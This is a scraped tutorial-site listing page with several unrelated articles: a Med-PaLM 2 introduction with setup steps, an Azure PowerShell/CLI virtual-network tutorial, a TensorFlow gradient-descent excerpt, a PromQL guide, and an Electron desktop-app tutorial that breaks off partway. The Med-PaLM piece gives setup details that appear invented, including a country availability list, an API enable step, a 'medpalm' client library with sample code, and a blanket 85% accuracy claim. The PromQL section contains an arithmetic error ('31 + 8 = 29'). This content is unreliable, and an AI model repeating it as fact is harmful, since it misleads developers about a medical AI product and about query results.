Introduction Med-PaLM 2 is a large language model (LLM) from Google Research, designed for the medical domain. It is trained on a massive dataset of text and code, including medical journals, textbooks, and clinical trials. Med-PaLM 2 can answer questions about a wide range of medical topics, including diseases, treatments, and procedures. It can also generate text, translate languages, and write different kinds of creative content. Use Cases Med-PaLM 2 can be used for a variety of purposes in the healthcare industry, including: Medical research: Med-PaLM 2 can be used to help researchers find and analyze medical data. It can also be used to generate hypotheses and test new ideas. Clinical decision support: Med-PaLM 2 can be used to help doctors diagnose diseases and make treatment decisions. It can also be used to provide patients with information about their condition and treatment options. Health education: Med-PaLM 2 can be used to create educational materials for patients and healthcare professionals. It can also be used to answer patients' questions about their health. Drug discovery: Med-PaLM 2 can be used to help researchers identify new drug targets and develop new drugs. Personalized medicine: Med-PaLM 2 can be used to help doctors personalize treatment for individual patients. It can do this by taking into account the patient's medical history, genetic makeup, and other factors. How to Get Started Med-PaLM 2 is currently available to a limited number of Google Cloud customers. To get started, you can visit the Google Cloud website: https://cloud.google.com/ and sign up for a free trial. Once you have a Google Cloud account, you can request access to Med-PaLM 2. Here are the steps on how to get started with using Med-PaLM: 1. Check if Med-PaLM is available in your country. Med-PaLM is currently only available in the following countries: United States Canada United Kingdom Australia New Zealand Singapore India Japan South KoreaYou can check the Med-PaLM website: https://sites.research.google/med-palm/ for the latest list of supported countries. 2. Create a Google Cloud Platform (GCP) account. Med-PaLM is a cloud-based service, so you will need to create a GCP account in order to use it. You can do this by going to the GCP website: https://cloud.google.com/ and clicking on the "Create Account" button. 3. Enable the Med-PaLM API. Once you have created a GCP account, you will need to enable the Med-PaLM API. You can do this by going to the API Library: https://console.cloud.google.com/apis/library and searching for "Med-PaLM". Click on the "Enable" button to enable the API. 4. Create a Med-PaLM service account. A service account is a special type of account that can be used to access GCP resources. You will need to create a service account in order to use Med-PaLM. You can do this by going to the IAM & Admin: https://console.cloud.google.com/iam-admin/ page and clicking on the "Create Service Account" button. 5. Download the Med-PaLM credentials. Once you have created a service account, you will need to download the credentials. The credentials will be a JSON file that contains your service account's email address and private key. You can download the credentials by clicking on the "Download JSON" button. 6. Set up the Med-PaLM client library. There are client libraries available for a variety of programming languages. You will need to install the client library for the language that you are using. You can find the client libraries on the Med-PaLM website: https://sites.research.google/med-palm/. 7. Initialize the Med-PaLM client. Once you have installed the client library, you can initialize the Med-PaLM client. The client will need your service account's email address and private key in order to authenticate with Med-PaLM. You can initialize the client by using the following code: import medpalm client = medpalm.Client(    email="your_service_account_email_address",    key_file="your_service_account_private_key.json" ) 8. Start using Med-PaLM! Once you have initialized the Med-PaLM client, you can start using it to access Med-PaLM's capabilities. For example, you can use Med-PaLM to answer medical questions, generate text, and translate languages. Key Features Med-PaLM 2 has a number of key features that make it a valuable tool for the healthcare industry. These features include: Accuracy: Med-PaLM 2 is highly accurate in answering medical questions. It has been shown to achieve an accuracy of 85% on a variety of medical question answering datasets. Expertise: Med-PaLM 2 is trained on a massive dataset of medical text and code. This gives it a deep understanding of medical concepts and terminology. Versatility: Med-PaLM 2 can be used for a variety of purposes in the healthcare industry. It can answer questions, generate text, translate languages, and write different kinds of creative content. Scalability: Med-PaLM 2 is scalable and can be used to process large amounts of data. This makes it a valuable tool for research and clinical applications. Conclusion Med-PaLM 2 is a powerful LLM that has the potential to revolutionize the healthcare industry. It can be used to improve medical research, clinical decision support, health education, drug discovery, and personalized medicine. Med-PaLM 2 is still under development, but it has already demonstrated the potential to make a significant impact on healthcare.  
Read more
  • 0
  • 0
  • 79259

article-image-automate-tasks-using-azure-powershell-and-azure-cli-tutorial
Gebin George
12 Jul 2018
5 min read
Save for later

Automate tasks using Azure PowerShell and Azure CLI [Tutorial]

Gebin George
12 Jul 2018
5 min read
It is no surprise that we commonly face repetitive and time-consuming tasks. For example, you might want to create multiple storage accounts. You would have to follow the same steps multiple times to get your job done. This is why Microsoft supports its Azure services with multiple ways of automating most of the tasks that can be implemented in Azure. In this Azure Powershell tutorial,  we will learn how to automate redundant tasks on Azure cloud. This article is an excerpt from the book, Hands-On Networking with Azure, written by Mohamed Waly. Azure PowerShell PowerShell is commonly used with most Microsoft products, and Azure is no less important than any of these products. You can use Azure PowerShell cmdlets to manage Azure Networking tasks, however, you should be aware that Microsoft Azure has two types of cmdlets, one for the ASM model, and another for the ARM model. The main difference between cmdlets of the ASM model and the ARM model is, there will be an RM added to the cmdlet of the current portal. For example, if you want to create an ASM virtual network, you would use the following cmdlet: New-AzureVirtualNetwork But for the ARM model, you would use the following: New-AzureRMVirtualNetwork Often, this would be the case. But a few Cmdlets are totally different and some others don't even exist in the ASM model and do exist in the ARM model. By default, you can use Azure PowerShell cmdlets in Windows PowerShell, but you will have to install its module first. Installing the Azure PowerShell module There are two ways of installing the Azure PowerShell module on Windows: Download and install the module from the following link: https://www.microsoft.com/web/downloads/platform.aspx Install the module from PowerShell Gallery Installing the Azure PowerShell module from PowerShell Gallery The following are the required steps to get Azure PowerShell installed: Open PowerShell in an elevated mode. To install the Azure PowerShell module for the current portal run the following cmdlet Install-Module AzureRM. If your PowerShell requires a NuGet provider you will be asked to agree to install it, and you will have to agree for the installation policy modification, as the repository is not available on your environment, as shown in the following screenshot: Creating a virtual network in Azure portal using PowerShell To be able to run your PowerShell cmdlets against Azure successfully, you need to log in first to Azure using the following cmdlet: Login-AzureRMAccount Then, you will be prompted to enter the credentials of your Azure account. Voila! You are logged in and you can run Azure PowerShell cmdlets successfully. To create an Azure VNet, you first need to create the subnets that will be attached to this virtual network. Therefore, let's get started by creating the subnets: $NSubnet = New-AzureRMVirtualNetworkSubnetConfig –Name NSubnet -AddressPrefix 192.168.1.0/24 $GWSubnet = New-AzureRMVirtualNetworkSubnetConfig –Name GatewaySubnet -AddressPrefix 192.168.2.0/27 Now you are ready to create a virtual network by triggering the following cmdlet: New-AzureRMVirtualNetwork -ResourceGroupName PacktPub -Location WestEurope -Name PSVNet -AddressPrefix 192.168.0.0/16 -Subnet $NSubnet,$GWSubnet Congratulations! You have your virtual network up and running with two subnets associated to it, one of them is a gateway subnet. Adding address space to a virtual network using PowerShell To add an address space to a virtual network, you need to retrieve the virtual network first and store it in a variable by running the following cmdlet: $VNet = Get-AzureRMVirtualNetwork -ResourceGroupName PacktPub -Name PSVNet Then, you can add the address space by running the following cmdlet: $VNet.AddressSpace.AddressPrefixes.Add("10.1.0.0/16") Finally, you need to save the changes you have made by running the following cmdlet: Set-AzureRmVirtualNetwork -VirtualNetwork $VNet Azure CLI Azure CLI is an open source, cross-platform that supports implementing all the tasks you can do in Azure portal, with commands. Azure CLI comes in two flavors: Azure CLI 2.0: Which supports only the current Azure portal Azure CLI 1.0: Which supports both portals Throughout this book, we will be using Azure CLI 2.0, so let's get started with its installation. Installing Azure CLI 2.0 Perform the following steps to install Azure CLI 2.0: Download Azure CLI 2.0, from the following link: https://azurecliprod.blob.core.windows.net/msi/azure-cli-2.0.22.msi Once downloaded, you can start the installation: Once you click on Install, it will start to validate your environment to check whether it is compatible with it or not, then it starts the installation: Once the installation completes, you can click on Finish, and you are good to go: Once done, you can open cmd, and write az to access Azure CLI commands: Creating a virtual network using Azure CLI 2.0 To create a virtual network using Azure CLI 2.0, you have to follow these steps: Log in to your Azure account using the following command az login, you have to open the URL that pops up on the CLI, and then enter the following code: To create a new virtual network, you need to run the following command: az network vnet create --name CLIVNet --resource-group PacktPub --location westeurope --address-prefix 192.168.0.0/16 --subnet-name s1 --subnet-prefix 192.168.1.0/24 Adding a gateway subnet to a virtual network using Azure CLI 2.0 To add a gateway subnet to a virtual network, you need to run the following command: az network vnet subnet create --address-prefix 192.168.7.0/27 --name GatewaySubnet --resource-group PacktPub --vnet-name CLIVNet Adding an address space to a virtual network using Azure CLI 2.0 To add an address space to a virtual network, you can run the following command: az network vnet update address-prefixes –add <Add JSON String> Remember that you will need to add a JSON string that describes the address space. To summarize, we learned how to automate cloud tasks using PowerShell and Azure CLI. Check out the book Hands-On Networking with Azure, to learn how to build large-scale, real-world apps using Azure networking solutions. Creating Multitenant Applications in Azure Fine Tune Your Web Application by Profiling and Automation Putting Your Database at the Heart of Azure Solutions
Read more
  • 0
  • 0
  • 78995
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-implementing-gradient-descent-algorithm-to-solve-optimization-problems
Sunith Shetty
22 Feb 2018
7 min read
Save for later

Implementing gradient descent algorithm to solve optimization problems

Sunith Shetty
22 Feb 2018
7 min read
[box type="note" align="" class="" width=""]This article is an excerpt from a book written by Rajdeep Dua and Manpreet Singh Ghotra titled Neural Network Programming with Tensorflow. In this book, you will learn to leverage the power of TensorFlow to train neural networks of varying complexities, without any hassle.[/box] Today we will focus on the gradient descent algorithm and its different variants. We will take a simple example of linear regression to solve the optimization problem. Gradient descent is the most successful optimization algorithm. As mentioned earlier, it is used to do weights updates in a neural network so that we minimize the loss function. Let's now talk about an important neural network method called backpropagation, in which we firstly propagate forward and calculate the dot product of inputs with their corresponding weights, and then apply an activation function to the sum of products which transforms the input to an output and adds non linearities to the model, which enables the model to learn almost any arbitrary functional mappings. Later, we back propagate in the neural network, carrying error terms and updating weights values using gradient descent, as shown in the following graph: Different variants of gradient descent Standard gradient descent, also known as batch gradient descent, will calculate the gradient of the whole dataset but will perform only one update. Therefore, it can be quite slow and tough to control for datasets which are extremely large and don't fit in the memory. Let's now look at algorithms that can solve this problem. Stochastic gradient descent (SGD) performs parameter updates on each training example, whereas mini batch performs an update with n number of training examples in each batch. The issue with SGD is that, due to the frequent updates and fluctuations, it eventually complicates the convergence to the accurate minimum and will keep exceeding due to regular fluctuations. Mini-batch gradient descent comes to the rescue here, which reduces the variance in the parameter update, leading to a much better and stable convergence. SGD and mini-batch are used interchangeably. Overall problems with gradient descent include choosing a proper learning rate so that we avoid slow convergence at small values, or divergence at larger values and applying the same learning rate to all parameter updates wherein if the data is sparse we might not want to update all of them to the same extent. Lastly, is dealing with saddle points. Algorithms to optimize gradient descent We will now be looking at various methods for optimizing gradient descent in order to calculate different learning rates for each parameter, calculate momentum, and prevent decaying learning rates. To solve the problem of high variance oscillation of the SGD, a method called momentum was discovered; this accelerates the SGD by navigating along the appropriate direction and softening the oscillations in irrelevant directions. Basically, it adds a fraction of the update vector of the past step to the current update vector. Momentum value is usually set to .9. Momentum leads to a faster and stable convergence with reduced oscillations. Nesterov accelerated gradient explains that as we reach the minima, that is, the lowest point on the curve, momentum is quite high and it doesn't know to slow down at that point due to the large momentum which could cause it to miss the minima entirely and continue moving up. Nesterov proposed that we first make a long jump based on the previous momentum, then calculate the gradient and then make a correction which results in a parameter update. Now, this update prevents us to go too fast and not miss the minima, and makes it more responsive to changes. Adagrad allows the learning rate to adapt based on the parameters. Therefore, it performs large updates for infrequent parameters and small updates for frequent parameters. Therefore, it is very well-suited for dealing with sparse data. The main flaw is that its learning rate is always decreasing and decaying. Problems with decaying learning rates are solved using AdaDelta. AdaDelta solves the problem of decreasing learning rate in AdaGrad. In AdaGrad, the learning rate is computed as one divided by the sum of square roots. At each stage, we add another square root to the sum, which causes the denominator to decrease constantly. Now, instead of summing all prior square roots, it uses a sliding window which allows the sum to decrease. Adaptive Moment Estimation (Adam) computes adaptive learning rates for each parameter. Like AdaDelta, Adam not only stores the decaying average of past squared gradients but additionally stores the momentum change for each parameter. Adam works well in practice and is one of the most used optimization methods today. The following two images (image credit: Alec Radford) show the optimization behavior of optimization algorithms described earlier. We see their behavior on the contours of a loss surface over time. Adagrad, RMsprop, and Adadelta almost quickly head off in the right direction and converge fast, whereas momentum and NAG are headed off-track. NAG is soon able to correct its course due to its improved responsiveness by looking ahead and going to the minimum. The second image displays the behavior of the algorithms at a saddle point. SGD, Momentum, and NAG find it challenging to break symmetry, but slowly they manage to escape the saddle point, whereas Adagrad, Adadelta, and RMsprop head down the negative slope, as can seen from the following image: Which optimizer to choose In the case that the input data is sparse or if we want fast convergence while training complex neural networks, we get the best results using adaptive learning rate methods. We also don't need to tune the learning rate. For most cases, Adam is usually a good choice. Optimization with an example Let's take an example of linear regression, where we try to find the best fit for a straight line through a number of data points by minimizing the squares of the distance from the line to each data point. This is why we call it least squares regression. Essentially, we are formulating the problem as an optimization problem, where we are trying to minimize a loss function. Let's set up input data and look at the scatter plot: #  input  data xData  =  np.arange(100,  step=.1) yData  =  xData  +  20  *  np.sin(xData/10) Define the data size and batch size: #  define  the  data  size  and  batch  size nSamples  =  1000 batchSize  =  100 We will need to resize the data to meet the TensorFlow input format, as follows: #  resize  input  for  tensorflow xData  =  np.reshape(xData,  (nSamples,  1)) yData  =  np.reshape(yData,  (nSamples,  1)) The following scope initializes the weights and bias, and describes the linear model and loss function: with tf.variable_scope("linear-regression-pipeline"): W  =  tf.get_variable("weights",  (1,1), initializer=tf.random_normal_initializer()) b  =  tf.get_variable("bias",   (1,  ), initializer=tf.constant_initializer(0.0)) # model yPred  =  tf.matmul(X,  W)  +  b # loss  function loss  =  tf.reduce_sum((y  -  yPred)**2/nSamples) We then set optimizers for minimizing the loss: # set the optimizer #optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss) #optimizer = tf.train.AdamOptimizer(learning_rate=.001).minimize(loss) #optimizer = tf.train.AdadeltaOptimizer(learning_rate=.001).minimize(loss) #optimizer = tf.train.AdagradOptimizer(learning_rate=.001).minimize(loss) #optimizer = tf.train.MomentumOptimizer(learning_rate=.001, momentum=0.9).minimize(loss) #optimizer = tf.train.FtrlOptimizer(learning_rate=.001).minimize(loss) optimizer = tf.train.RMSPropOptimizer(learning_rate=.001).minimize(loss) We then select the mini batch and run the optimizers errors = [] with tf.Session() as sess: # init variables sess.run(tf.global_variables_initializer()) for _ in range(1000): # select mini batch indices = np.random.choice(nSamples, batchSize) xBatch, yBatch = xData[indices], yData[indices] # run optimizer _, lossVal = sess.run([optimizer, loss], feed_dict={X: xBatch, y: yBatch}) errors.append(lossVal) plt.plot([np.mean(errors[i-50:i]) for i in range(len(errors))]) plt.show() plt.savefig("errors.png") The output of the preceding code is as follows: We also get a sliding curve, as follows: We learned optimization is a complicated subject and a lot depends on the nature and size of our data. Also, optimization depends on weight matrices. A lot of these optimizers are trained and tuned for tasks like image classification or predictions. However, for custom or new use cases, we need to perform trial and error to determine the best solution. To know more about how to build and optimize neural networks using TensorFlow, do checkout this book Neural Network Programming with Tensorflow.  
Read more
  • 0
  • 0
  • 78900

article-image-mastering-promql-a-comprehensive-guide-to-prometheus-query-language
Rob Chapman, Peter Holmes
07 Nov 2024
15 min read
Save for later

Mastering PromQL: A Comprehensive Guide to Prometheus Query Language

Rob Chapman, Peter Holmes
07 Nov 2024
15 min read
This article is an excerpt from the book, "Observability with Grafana", by Rob Chapman, Peter Holmes. This book provides a holistic understanding of observability concepts using the Grafana Labs tools, teaching you how to fully leverage the LGTM stack.Introduction PromQL, or Prometheus Query Language, is a powerful tool designed to work with Prometheus, an open-source systems monitoring and alerting toolkit. Initially developed by SoundCloud in 2012 and later accepted by the Cloud Native Computing Foundation in 2016, Prometheus has become a crucial component of modern infrastructure monitoring. PromQL allows users to query data stored in Prometheus, enabling the creation of insightful dashboards and setting up alerts based on the performance metrics of applications and systems. This article will explore the core functionalities of PromQL, including how it interacts with metrics data and how it can be used to effectively monitor and analyze system performance. Introducing PromQL Prometheus was initially developed by SoundCloud in 2012; the project was accepted by the Cloud Native Computing Foundation in 2016 as the second incubated project (after Kubernetes), and version 1.0 was released shortly after. PromQL is an integral part of Prometheus, which is used to query stored data and produce dashboards and alerts. Before we delve into the details of the language, let’s briefly look at the following ways in which Prometheus-compatible systems  interact with metrics data: Ingesting metrics: Prometheus-compatible systems accept a timestamp, key-value labels, and a sample value. As the details of the Prometheus Time Series Database (TSDB) are  quite complicated, the following diagram shows a simplified example of how an individual sample for a metric is stored once it has been ingested:           Figure 5.1 – A simplified view of metric data stored in the TSDB The labels or dimensions of a metric: Prometheus labels provide metadata to identify data of interest. These labels create metrics, time series, and samples: * Each unique __name__ value creates a metric. In the preceding figure, the metric is app_ frontend_requests. * Each unique set of labels creates a time series. In the preceding figure, the set of all labels is the time series. * A time series will contain multiple samples, each with a unique timestamp. The preceding figure shows a single sample, but over time, multiple samples will be collected for each  time series. * The number of unique values for a metric label is referred to as the cardinality of the l abel. Highly cardinal labels should be avoided, as they signifi cantly increase the storage costs of the metric. The following diagram shows a single metric containing two time series and five samples:        Figure 5.2 – An example of samples from multiple time series In Grafana, we can see a representation of the time series and samples from a metric. To do this, follow these steps: 1. In your Grafana instance, select Explore in the menu. 2. Choose your Prometheus data source, which will be labeled as grafanacloud-<team>prom (default). 3. In the Metric dropdown, choose app_frontend_requests_total, and under Options, set Format to Table, and then click on Run query. Th is will show you all the samples and time series in the metric over the selected time range. You should see data like this:    Figure 5.3 – Visualizing the samples and time series that make up a metric Now that we understand the data structure, let’s explore PromQL. An overview of PromQL features In this section, we will take you through the features that PromQL has. We will start with an explanation of the data types, and then we will look at how to select data, how to work on multiple datasets, and how to use functions. As PromQL is a query language, it’s important to know how to manipulate data to produce alerts and dashboards. Data types PromQL offers three data types, which are important, as the functions and operators in PromQL will work diff erently depending on the data types presented: Instant vectors are a data type that stores a set of time series containing a single sample, all sharing the same timestamp – that is, it presents values at a specifi c instant in time:                             Figure 5.4 – An instant vector Range vectors store a set of time series, each containing a range of samples with different timestamps:                              Figure 5.5 – Range vectors Scalars are simple numeric values, with no labels or timestamps involved. Selecting data PromQL offers several tools for you to select data to show in a dashboard or a list, or just to understand a system’s state. Some of these are described in the following table: Table 5.1 – The selection operators available in PromQL In addition to the operators that allow us to select data, PromQL offers a selection of operators to compare multiple sets of data. Operators between two datasets Some data is easily provided by a single metric, while other useful information needs to be created from multiple metrics. The following operators allow you to combine datasets. Table 5.2 – The comparison operators available in PromQL Vector matching is an initially confusing topic; to clarify it, let’s consider examples for the three cases of vector matching – one-to-one, one-to-many/many-to-one, and many-to-many. By default, when combining vectors, all label names and values are matched. This means that for each element of the vector, the operator will try to find a single matching element from the second vector.  Let’s consider a simple example: Vector A: 10{color=blue,smell=ocean} 31{color=red,smell=cinnamon} 27{color=green,smell=grass} Vector B: 19{color=blue,smell=ocean} 8{color=red,smell=cinnamon} ‚ 14{color=green,smell=jungle} A{} + B{}: 29{color=blue,smell=ocean} 39 {color=red,smell=cinnamon} A{} + on (color) B{} or A{} + ignoring (smell) B{}: 29{color=blue} 39{color=red} 41{color=green} When color=blue and smell=ocean, A{} + B{} gives 10 + 19 = 29, and when color=red and smell=cinnamon, A{} + B{} gives 31 + 8 = 29. The other elements do not match the two vectors so are ignored. When we sum the vectors using on (color), we will only match on the color label; so now, the two green elements match and are summed. This example works when there is a one-to-one relationship of labels between vector A and vector B. However, sometimes there may be a many-to-one or one-to-many relationship – that is, vector A or vector B may have more than one element that matches the other vector. In these cases, Prometheus will give an error, and grouping syntax must be used. Let’s look at another example to illustrate this: Vector A: 7{color=blue,smell=ocean} 5{color=red,smell=cinamon} 2{color=blue,smell=powder} Vector B: 20{color=blue,smell=ocean} 8{color=red,smell=cinamon} ‚ 14{color=green,smell=jungle} A{} + on (color) group_left  B{}: 27{color=blue,smell=ocean} 13{color=red,smell=cinamon} 22{color=blue,smell=powder} Now, we have two different elements in vector A with color=blue. The group_left command will use the labels from vector A but only match on color. This leads to the third element of the combined vector having a value of 22, when the item matching in vector B has a different smell. The group_right operator will behave in the opposite direction. The final option is a many-to-many vector match. These matches use the logical operators and, unless, and or to combine parts of vectors A and B. Let’s see some examples: Vector A: 10{color=blue,smell=ocean} 31{color=red,smell=cinamon} 27{color=green,smell=grass} Vector B: 19{color=blue,smell=ocean} 8{color=red,smell=cinamon} ‚ 14{color=green,smell=jungle} A{} and B{}: 10{color=blue,smell=ocean} 31{color=red,smell=cinamon} A{} unless B{}: 27{color=green,smell=grass} A{} or B{}: 10{color=blue,smell=ocean} 31{color=red,smell=cinamon} 27{color=green,smell=grass} 14{color=green,smell=jungle} Unlike the previous examples, mathematical operators are not being used here, so the values of the elements are the values from vector A, but only the elements of A that match the logical condition in B are returned. ConclusionPromQL is an essential component of Prometheus, offering users a flexible and powerful means of querying and analyzing time-series data. By understanding its data types and operators, users can craft complex queries that provide deep insights into system performance. The language supports a variety of data selection and comparison operations, allowing for precise monitoring and alerting. Whether working with instant vectors, range vectors, or scalars, PromQL enables developers and operators to optimize their use of Prometheus for monitoring and alerting, ensuring systems remain performant and reliable. As organizations continue to embrace cloud-native architectures, mastering PromQL becomes increasingly vital for maintaining robust and efficient systems. Author BioRob Chapman is a creative IT engineer and founder at The Melt Cafe, with two decades of experience in the full application life cycle. Working over the years for companies such as the Environment Agency, BT Global Services, Microsoft, and Grafana, Rob has built a wealth of experience on large complex systems. More than anything, Rob loves saving energy, time, and money and has a track record for bringing production-related concerns forward so that they are addressed earlier in the development cycle, when they are cheaper and easier to solve. In his spare time, Rob is a Scout leader, and he enjoys hiking, climbing, and, most of all, spending time with his family and six children.Peter Holmes is a senior engineer with a deep interest in digital systems and how to use them to solve problems. With over 16 years of experience, he has worked in various roles in operations. Working at organizations such as Boots UK, Fujitsu Services, Anaplan, Thomson Reuters, and the NHS, he has experience in complex transformational projects, site reliability engineering, platform engineering, and leadership. Peter has a history of taking time to understand the customer and ensuring Day-2+ operations are as smooth and cost-effective as possible.
Read more
  • 0
  • 0
  • 78790

article-image-how-to-create-a-desktop-application-with-electron-tutorial
Bhagyashree R
06 Feb 2019
15 min read
Save for later

How to create a desktop application with Electron [Tutorial]

Bhagyashree R
06 Feb 2019
15 min read
Electron is an open source framework, created by GitHub, that lets you develop desktop executables that bring together Node and Chrome to provide a full GUI experience. Electron has been used for several well-known projects, including developer tools such as Visual Studio Code, Atom, and Light Table. Basically, you can define the UI with HTML, CSS, and JS (or using React, as we'll be doing), but you can also use all of the packages and functions in Node. So, you won't be limited to a sandboxed experience, being able to go beyond what you could do with just a browser. This article is taken from the book  Modern JavaScript Web Development Cookbook by Federico Kereki.  This problem-solving guide teaches you popular problems solving techniques for JavaScript on servers, browsers, mobile phones, and desktops. To follow along with the examples implemented in this article, you can download the code from the book's GitHub repository. In this article, we will look at how we can use Electron together with the tools like, React and Node, to create a native desktop application, which you can distribute to users. Setting up Electron We will start with installing Electron, and then in the later recipes, we'll see how we can turn a React app into a desktop program. You can install Electron by executing the following command: npm install electron --save-dev Then, we'll need a starter JS file. Taking some tips from the main.js file, we'll create the following electron-start.js file: // Source file: electron-start.js /* @flow */ const { app, BrowserWindow } = require("electron"); let mainWindow; const createWindow = () => { mainWindow = new BrowserWindow({ height: 768, width: 1024 }); mainWindow.loadURL("http://localhost:3000"); mainWindow.on("closed", () => { mainWindow = null; }); }; app.on("ready", createWindow); app.on("activate", () => mainWindow === null && createWindow()); app.on( "window-all-closed", () => process.platform !== "darwin" && app.quit() ); Here are some points to note regarding the preceding code snippet: This code runs in Node, so we are using require() instead of import The mainWindow variable will point to the browser instance where our code will run We'll start by running our React app, so Electron will be able to load the code from http://localhost:3000 In our code, we also have to process the following events: "ready" is called when Electron has finished its initialization and can start creating windows. "closed" means your window was closed; your app might have several windows open, so at this point, you should delete the closed one. "window-all-closed" implies your whole app was closed. In Windows and Linux, this means quitting, but for macOS, you don't usually quit applications, because of Apple' s usual rules. "activate" is called when your app is reactivated, so if the window had been deleted (as in Windows or Linux), you have to create it again. We already have our React app (you can find the React app in the GitHub repository) in place, so we just need a way to call Electron. Add the following script to package.json, and you'll be ready: "scripts": { "electron": "electron .", . . . How it works... To run the Electron app in development mode, we have to do the following: Run our restful_server_cors server code from the GitHub repository. Start the React app, which requires the server to be running. Wait until it's loaded, and then and only then, move on to the next step. Start Electron. So, basically, you'll have to run the following two commands, but you'll need to do so in separate terminals: // in the directory for our restful server: node out/restful_server_cors.js // in the React app directory: npm start // and after the React app is running, in other terminal: npm run electron After starting Electron, a screen quickly comes up, and we again find our countries and regions app, now running independently of a browser: The app works as always; as an example, I selected a country, Canada, and correctly got its list of regions: We are done! You can see that everything is interconnected, as before, in the sense that if you make any changes to the React source code, they will be instantly reflected in the Electron app. Adding Node functionality to your app In the previous recipe, we saw that with just a few small configuration changes, we can turn our web page into an application. However, you're still restricted in terms of what you can do, because you are still using only those features available in a sandboxed browser window. You don't have to think this way, for you can add basically all Node functionality using functions that let you go beyond the limits of the web. Let's see how to do it in this recipe. How to do it We want to add some functionality to our app of the kind that a typical desktop would have. The key to adding Node functions to your app is to use the remote module in Electron. With it, your browser code can invoke methods of the main process, and thus gain access to extra functionality. Let's say we wanted to add the possibility of saving the list of a country's regions to a file. We'd require access to the fs module to be able to write a file, and we'd also need to open a dialog box to select what file to write to. In our serviceApi.js file, we would add the following functions: // Source file: src/regionsApp/serviceApi.js /* @flow */ const electron = window.require("electron").remote; . . . const fs = electron.require("fs"); export const writeFile = fs.writeFile.bind(fs); export const showSaveDialog = electron.dialog.showSaveDialog; Having added this, we can now write files and show dialog boxes from our main code. To use this functionality, we could add a new action to our world.actions.js file: // Source file: src/regionsApp/world.actions.js /* @flow */ import { getCountriesAPI, getRegionsAPI, showSaveDialog, writeFile } from "./serviceApi"; . . . export const saveRegionsToDisk = () => async ( dispatch: ({}) => any, getState: () => { regions: [] } ) => { showSaveDialog((filename: string = "") => { if (filename) { writeFile(filename, JSON.stringify(getState().regions), e => e && window.console.log(`ERROR SAVING ${filename}`, e); ); } }); }; When the saveRegionsToDisk() action is dispatched, it will show a dialog to prompt the user to select what file is to be written, and will then write the current set of regions, taken from getState().regions, to the selected file in JSON format. We just have to add the appropriate button to our <RegionsTable> component to be able to dispatch the necessary action: // Source file: src/regionsApp/regionsTableWithSave.component.js /* @flow */ import React from "react"; import PropTypes from "prop-types"; import "../general.css"; export class RegionsTable extends React.PureComponent<{ loading: boolean, list: Array<{ countryCode: string, regionCode: string, regionName: string }>, saveRegions: () => void }> { static propTypes = { loading: PropTypes.bool.isRequired, list: PropTypes.arrayOf(PropTypes.object).isRequired, saveRegions: PropTypes.func.isRequired }; static defaultProps = { list: [] }; render() { if (this.props.list.length === 0) { return <div className="bordered">No regions.</div>; } else { const ordered = [...this.props.list].sort( (a, b) => (a.regionName < b.regionName ? -1 : 1) ); return ( <div className="bordered"> {ordered.map(x => ( <div key={x.countryCode + "-" + x.regionCode}> {x.regionName} </div> ))} <div> <button onClick={() => this.props.saveRegions()}> Save regions to disk </button> </div> </div> ); } } } We are almost done! When we connect this component to the store, we'll simply add the new action, as follows: // Source file: src/regionsApp/regionsTableWithSave.connected.js /* @flow */ import { connect } from "react-redux"; import { RegionsTable } from "./regionsTableWithSave.component"; import { saveRegionsToDisk } from "./world.actions"; const getProps = state => ({ list: state.regions, loading: state.loadingRegions }); const getDispatch = (dispatch: any) => ({ saveRegions: () => dispatch(saveRegionsToDisk()) }); export const ConnectedRegionsTable = connect( getProps, getDispatch )(RegionsTable); How it works The code we added showed how we could gain access to a Node package (fs, in our case) and some extra functions, such as showing a Save to disk dialog. When we run our updated app and select a country, we'll see our newly added button, as in the following screenshot: Clicking on the button will pop up a dialog, allowing you to select the destination for the data: If you click Save, the list of regions will be written in JSON format, as we specified earlier in our writeRegionsToDisk() function. Building a more windowy experience In the previous recipe, we added the possibility of using any and all of the functions provided by Node. In this recipe, let's now focus on making our app more window-like, with icons, menus, and so on. We want the user to really believe that they're using a native app, with all the features that they would be accustomed to. The following list of interesting subjects from Electron APIs is just a short list of highlights, but there are many more available options: clipboardTo do copy and paste operations using the system's clipboarddialogTo show the native system dialogs for messages, alerts, opening and saving files, and so onglobalShortcutTo detect keyboard shortcutsMenu, MenuItemTo create a menu bar with menus and submenusNotificationTo add desktop notificationspowerMonitor, powerSaveBlockerTo monitor power state changes, and to disable entering sleep modescreenTo get information about the screen, displays, and so onTrayTo add icons and context menus to the system's tray Let's add a few of these functions so that we can get a better-looking app that is more integrated to the desktop. How to do it Any decent app should probably have at least an icon and a menu, possibly with some keyboard shortcuts, so let's add those features now, and just for the sake of it, let's also add some notifications for when regions are written to disk. Together with the Save dialog we already used, this means that our app will include several native windowing features. To start with, let's add an icon. Showing an icon is the simplest thing because it just requires an extra option when creating the BrowserWindow() object. I'm not very graphics-visual-designer oriented, so I just downloaded the Alphabet, letter, r Icon Free file from the Icon-Icons website. Implement the icon as follows: mainWindow = new BrowserWindow({ height: 768, width: 1024, icon: "./src/regionsApp/r_icon.png" }); You can also choose icons for the system tray, although there's no way of using our regions app in that context, but you may want to look into it nonetheless. To continue, the second feature we'll add is a menu, with some global shortcuts to boot. In our App.regions.js file, we'll need to add a few lines to access the Menu module, and to define our menu itself: // Source file: src/App.regions.js . . . import { getRegions } from "./regionsApp/world.actions"; . . . const electron = window.require("electron").remote; const { Menu } = electron; const template = [ { label: "Countries", submenu: [ { label: "Uruguay", accelerator: "Alt+CommandOrControl+U", click: () => store.dispatch(getRegions("UY")) }, { label: "Hungary", accelerator: "Alt+CommandOrControl+H", click: () => store.dispatch(getRegions("HU")) } ] }, { label: "Bye!", role: "quit" } ]; const mainMenu = Menu.buildFromTemplate(template); Menu.setApplicationMenu(mainMenu); Using a template is a simple way to create a menu, but you can also do it manually, adding item by item. I decided to have a Countries menu with two options to show the regions for Uruguay and Hungary. The click property dispatches the appropriate action. I also used the accelerator property to define global shortcuts. See the accelerator.md for the list of possible key combinations to use, including the following: Command keys, such as Command (or Cmd), Control (or Ctrl), or both (CommandOrControl or CmdOrCtrl) Alternate keys, such as Alt, AltGr, or Option Common keys, such as Shift, Escape (or Esc), Tab, Backspace, Insert, or Delete Function keys, such as F1 to F24 Cursor keys, including Up, Down, Left, Right, Home, End, PageUp, and PageDown Media keys, such as MediaPlayPause, MediaStop, MediaNextTrack, MediaPreviousTrack, VolumeUp, VolumeDown, and 